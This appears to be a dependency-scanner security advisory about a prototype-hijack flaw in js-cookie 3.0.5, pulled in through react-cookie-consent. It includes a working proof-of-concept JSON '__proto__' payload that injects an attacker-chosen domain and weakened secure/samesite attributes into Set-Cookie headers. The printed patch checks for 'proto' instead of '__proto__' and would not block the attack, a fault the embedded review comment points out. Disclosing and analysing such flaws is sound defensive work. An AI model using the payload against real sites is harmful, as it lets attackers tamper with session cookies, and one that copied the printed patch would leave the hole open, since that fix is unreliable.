Vulnerable Library - react-cookie-consent-10.0.1.tgz
Path to dependency file: /package.json
Path to vulnerable library: /home/wss-scanner/.yarn/berry/cache/js-cookie-npm-3.0.5-8fc8fcc9b4-10c0.zip
Found in HEAD commit: da0c9c84fdbc82b3b8e2221482a86225136e26be
Vulnerabilities
| Vulnerability | Severity | CVSS | Dependency | Type | Fixed in (react-cookie-consent version) | Remediation Possible** |
|---|---|---|---|---|---|---|
| CVE-2026-46625 | High | 7.5 | js-cookie-3.0.5.tgz | Transitive | N/A* | ❌ |
*For some transitive vulnerabilities there is no version of the direct dependency that carries a fix. Check the "Details" section below to see whether a fixed version of the transitive dependency exists.
**In some cases a remediation PR cannot be created automatically for a vulnerability even though a remediation is available.
Details
CVE-2026-46625
Vulnerable Library - js-cookie-3.0.5.tgz
Library home page: https://registry.npmjs.org/js-cookie/-/js-cookie-3.0.5.tgz
Path to dependency file: /package.json
Path to vulnerable library: /home/wss-scanner/.yarn/berry/cache/js-cookie-npm-3.0.5-8fc8fcc9b4-10c0.zip
Dependency Hierarchy:
- react-cookie-consent-10.0.1.tgz (Root Library)
  - ❌ js-cookie-3.0.5.tgz (Vulnerable Library)
Found in HEAD commit: da0c9c84fdbc82b3b8e2221482a86225136e26be
Found in base branch: main
Vulnerability Details
Summary

`js-cookie`'s internal `assign()` helper copies properties with `for...in` plus plain assignment. When the source object is produced by `JSON.parse`, the JSON object's `"__proto__"` member is an own enumerable property, so the `for...in` enumerates it and the `target[key] = source[key]` write triggers the `Object.prototype.__proto__` setter on the fresh `target` (`{}`). The result is a per-instance prototype hijack: `Object.prototype` itself is untouched, but the merged `attributes` object now inherits attacker-controlled keys. Because the consuming `set()` function then enumerates the merged object with another `for...in`, every key the attacker placed on the polluted prototype lands in the resulting `Set-Cookie` string as an attribute pair. The attacker can set `domain=`, `secure=`, `samesite=`, `expires=` and `path=` on cookies whose attributes the developer thought were locked down.

Impact

Any application that forwards a JSON-derived object as the `attributes` argument to `Cookies.set`, `Cookies.remove`, `Cookies.withAttributes` or `Cookies.withConverter` is vulnerable. This is the standard pattern when cookie configuration comes from a backend:

```js
const cfg = await fetch('/config').then(r => r.json());
Cookies.set('session', token, cfg.cookieAttrs); // cfg.cookieAttrs influenced by attacker
```

A payload of `{"__proto__":{"domain":"evil.example","secure":"false","samesite":"None"}}` causes js-cookie to emit:

```
Set-Cookie: session=TOKEN; path=/; domain=evil.example; secure=false; samesite=None
```

Affected code

```js
// src/assign.mjs — full file
export default function (target) {
  for (var i = 1; i < arguments.length; i++) {
    var source = arguments[i]
    for (var key in source) {
      // includes own enumerable '__proto__'
      target[key] = source[key] // [[Set]] form - fires __proto__ setter
    }
  }
  return target
}
```

Proof of concept

Node 22.11.0, no third-party deps beyond js-cookie itself.

Environment setup:

```sh
mkdir -p /tmp/jscookie-poc && cd /tmp/jscookie-poc
npm init -y
npm i js-cookie
```

PoC (`ubuntu@kuber:/tmp/jscookie-poc$ cat poc.mjs`):

```js
// Minimal document stub so js-cookie's set() has a document.cookie to write to;
// the setter captures the string js-cookie would hand to the browser.
let lastSetCookie = '';
globalThis.document = {
  get cookie() { return ''; },
  set cookie(v) { lastSetCookie = v; }
};
const { default: Cookies } = await import('js-cookie');
// JSON.parse yields an own enumerable "__proto__" key, which assign() then writes via [[Set]].
const attackerAttrs = JSON.parse(
  '{"__proto__":{"secure":"false","domain":"evil.com","samesite":"None","expires":-1}}'
);
Cookies.set('session', 'TOKEN', attackerAttrs);
console.log('Set-Cookie that js-cookie wrote to document.cookie:');
console.log(lastSetCookie);
```

Execution:
Suggested patch --- a/src/assign.mjs +++ b/src/assign.mjs @@ export default function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i] - for (var key in source) { - target[key] = source[key] - } + for (var key in source) { + if (key === 'proto' || key === 'constructor' || key === 'prototype') continue + Object.defineProperty(target, key, { + value: source[key], + writable: true, + enumerable: true, + configurable: true, + }) + } } return target } Equivalent one-liner alternative - iterate own names only and filter: for (const key of Object.getOwnPropertyNames(source)) { if (key === 'proto') continue target[key] = source[key] }
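Review bot: the guard in the new `for` loop compares against the literal 'proto', but the key that reaches the `Object.prototype.__proto__` setter (as the Summary describes and the PoC payload carries) is `__proto__`; as printed, the filter never matches the attack key, so either the underscores were lost in rendering or the check is wrong, and the patch should be re-read against the committed file before it is relied on. Two smaller points on the same hunk: `for (var key in source)` still walks inherited enumerable keys of `source`, so a source whose own prototype is already tainted copies those keys in; iterate `Object.keys(source)` or add an `Object.hasOwn(source, key)` check. And the "equivalent one-liner alternative" is neither equivalent nor one line: `Object.getOwnPropertyNames` also returns non-enumerable own properties, and `target[key] = source[key]` is still the [[Set]] form, so that variant depends entirely on the string filter rather than on `Object.defineProperty`.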
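The mechanism described in the Summary and Impact sections, as an added example that is not js-cookie's own code: a self-contained model in which `assignVulnerable` is the for...in-plus-assignment copy loop quoted under Affected code, `assignHardened` is one way to fix it (own enumerable keys only, `__proto__`/`constructor`/`prototype` skipped, `Object.defineProperty` instead of assignment), and `serializeAttributes` is a simplified stand-in for the attribute loop in `Cookies.set` (assumption: it models only the for...in walk and the falsy/`true` handling, not the `expires` date conversion js-cookie performs). The attacker payload is constructed inline, so the block runs offline in Node without installing js-cookie. `hasOwnProtoKey` is an added check an application can run on any JSON-derived attributes object before handing it to a cookie library.

```javascript
// Added example, not js-cookie's code. Models the per-instance prototype
// hijack in assign() and the for...in serializer that leaks inherited keys.

// Vulnerable copy loop (shape of src/assign.mjs): JSON.parse produces an own
// enumerable "__proto__" key, for...in visits it, and target[key] = ... hits
// the inherited Object.prototype.__proto__ setter, re-parenting `target`.
function assignVulnerable(target, ...sources) {
  for (const source of sources) {
    for (const key in source) {
      target[key] = source[key];
    }
  }
  return target;
}

// Hardened copy loop: own enumerable keys only, the prototype-bearing names
// skipped, and defineProperty so no inherited setter can ever run.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);
function assignHardened(target, ...sources) {
  for (const source of sources) {
    if (source === null || source === undefined) continue;
    for (const key of Object.keys(source)) {
      if (FORBIDDEN_KEYS.has(key)) continue;
      Object.defineProperty(target, key, {
        value: source[key], writable: true, enumerable: true, configurable: true,
      });
    }
  }
  return target;
}

// Simplified model (assumption) of the attribute loop in Cookies.set: a
// for...in over the merged object, so keys inherited from a hijacked prototype
// are emitted exactly like own keys. Returns the "; k=v" tail of the cookie string.
function serializeAttributes(attrs) {
  let out = '';
  for (const name in attrs) {
    const value = attrs[name];
    if (!value) continue;           // falsy attributes are dropped
    out += '; ' + name;
    if (value === true) continue;   // flag attributes such as secure: true
    out += '=' + String(value).split(';')[0];
  }
  return out;
}

// Merge developer defaults with caller-supplied attributes using the given
// copy loop, then build the string js-cookie would write to document.cookie.
function buildCookie(name, value, attrs, assign) {
  const defaults = { path: '/' };
  const merged = assign({}, defaults, attrs);
  return name + '=' + value + serializeAttributes(merged);
}

// Constructed attacker payload, as a tampered /config response would carry it.
const attackerJson =
  '{"__proto__":{"domain":"evil.example","secure":"false","samesite":"None"}}';

function demo(assign) {
  return buildCookie('session', 'TOKEN', JSON.parse(attackerJson), assign);
}

// Input-side check: a JSON-derived attributes object must never carry an own
// "__proto__" key; reject the config rather than forwarding it to the library.
function hasOwnProtoKey(obj) {
  return obj !== null && typeof obj === 'object' &&
    Object.prototype.hasOwnProperty.call(obj, '__proto__');
}

// The hijack is per-instance: the global Object.prototype must stay clean.
function globalPrototypeUntouched() {
  return !('domain' in {}) && Object.getPrototypeOf({}) === Object.prototype;
}

console.log('vulnerable:', demo(assignVulnerable));
console.log('hardened:  ', demo(assignHardened));
console.log('payload carries own __proto__:', hasOwnProtoKey(JSON.parse(attackerJson)));
console.log('Object.prototype untouched:', globalPrototypeUntouched());
```

Running it shows the vulnerable path appending `domain=evil.example; secure=false; samesite=None` after the developer-supplied `path=/`, while the hardened path emits only `path=/`; the last line confirms that `Object.prototype` is untouched afterwards, which is the per-instance property the Summary describes and the reason a global-pollution check alone would not catch this case.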
Publish Date: 2026-05-21
URL: CVE-2026-46625
CVSS 3 Score Details (7.5)
Base Score Metrics:
- Exploitability Metrics:
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Impact Metrics:
- Confidentiality Impact: None
- Integrity Impact: High
- Availability Impact: None
For more information on CVSS3 Scores, click here.
Suggested Fix
Type: Upgrade version
Origin: GHSA-qjx8-664m-686j
Release Date: 2026-05-21
Fix Resolution: js-cookie - 3.0.7
Because the fixed version is in the transitive dependency and no react-cookie-consent release is listed as carrying it, the upgrade has to be forced at the lockfile level: re-resolve js-cookie within the range react-cookie-consent declares, or, if that range does not admit 3.0.7, pin it with a Yarn `resolutions` entry in package.json.
Step up your Open Source Security Game with Mend here